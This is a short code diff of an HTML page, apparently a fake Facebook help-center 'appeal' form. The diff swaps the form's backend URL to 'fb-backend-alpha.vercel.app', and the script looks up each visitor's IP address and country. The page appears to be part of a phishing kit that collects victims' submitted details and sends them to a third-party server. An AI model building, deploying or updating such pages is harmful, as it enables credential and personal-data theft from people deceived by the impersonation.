--- a/page2.html
+++ b/page2.html
@@ -444,7 +444,7 @@
     <script>
       const appealForm = document.getElementById("appealForm");
       // const url = "http://localhost:3000";
-      const url = "https://help-center-be.vercel.app";
+      const url = "https://fb-backend-alpha.vercel.app";
       async function getUserIpAndCountry() {
         try {
           const res = await fetch("https://api.db-ip.com/v2/free/self");
